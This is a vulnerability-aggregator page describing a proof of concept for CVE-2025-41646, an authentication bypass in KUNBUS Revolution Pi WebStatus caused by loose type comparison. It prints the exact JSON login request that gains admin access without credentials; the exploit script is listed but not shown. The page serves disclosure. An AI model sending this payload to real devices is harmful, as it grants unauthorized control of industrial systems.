POC详情: edc6123ade7c5003031d6e2c53a0bf394c62f7de

来源
https://github.com/GreenForceNetwork/CVE-2025-41646---Critical-Authentication-Bypass-
关联漏洞
标题: KUNBUS Revolution Pi 代码问题漏洞 (CVE-2025-41646)
描述:KUNBUS Revolution Pi是KUNBUS公司的一款基于 Raspberry Pi 的开放式、模块化且经济高效的工业 PC。 KUNBUS Revolution Pi存在代码问题漏洞,该漏洞源于类型转换错误,可能导致身份验证绕过。
描述
CVE-2025-41646 - Critical Authentication bypass
介绍
# CVE-2025-41646---Critical-Authentication-Bypass-
CVE-2025-41646 - Critical Authentication bypass

# 🔓 CVE-2025-41646 - RevPi WebStatus Authentication Bypass PoC

A critical authentication bypass vulnerability (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 allows an attacker to log in as **admin** without valid credentials due to weak type comparison logic (`==` vs `===`).

---

## 📌 Affected

- RevPi WebStatus v2.4.5 and below
- Industrial/OT systems running on Raspbian with Apache

---

## 💥 Exploitation

Send a login request with:

```json
{
  "mode": "LOGIN",
  "username": "admin",
  "hashcode": true
}
文件快照

 [4.0K]  /data/pocs/edc6123ade7c5003031d6e2c53a0bf394c62f7de
├── [ 701]  Exploit.py
└── [ 624]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。